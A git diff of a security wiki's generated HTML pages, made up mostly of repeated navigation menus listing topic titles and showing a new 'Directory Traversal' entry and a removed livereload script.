        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -346,22 +346,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html b/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html index 17ba305d..08a90a73 100644 --- a/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Security Definitions/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -193,22 +193,6 @@

Threat Models - - diff --git a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html index a1e5743a..a7b2a281 100644 --- a/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html +++ b/docs/Cryptography/Private-Key Cryptography/Stream Ciphers/Hardware-Oriented Stream Ciphers/Grain-128a.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
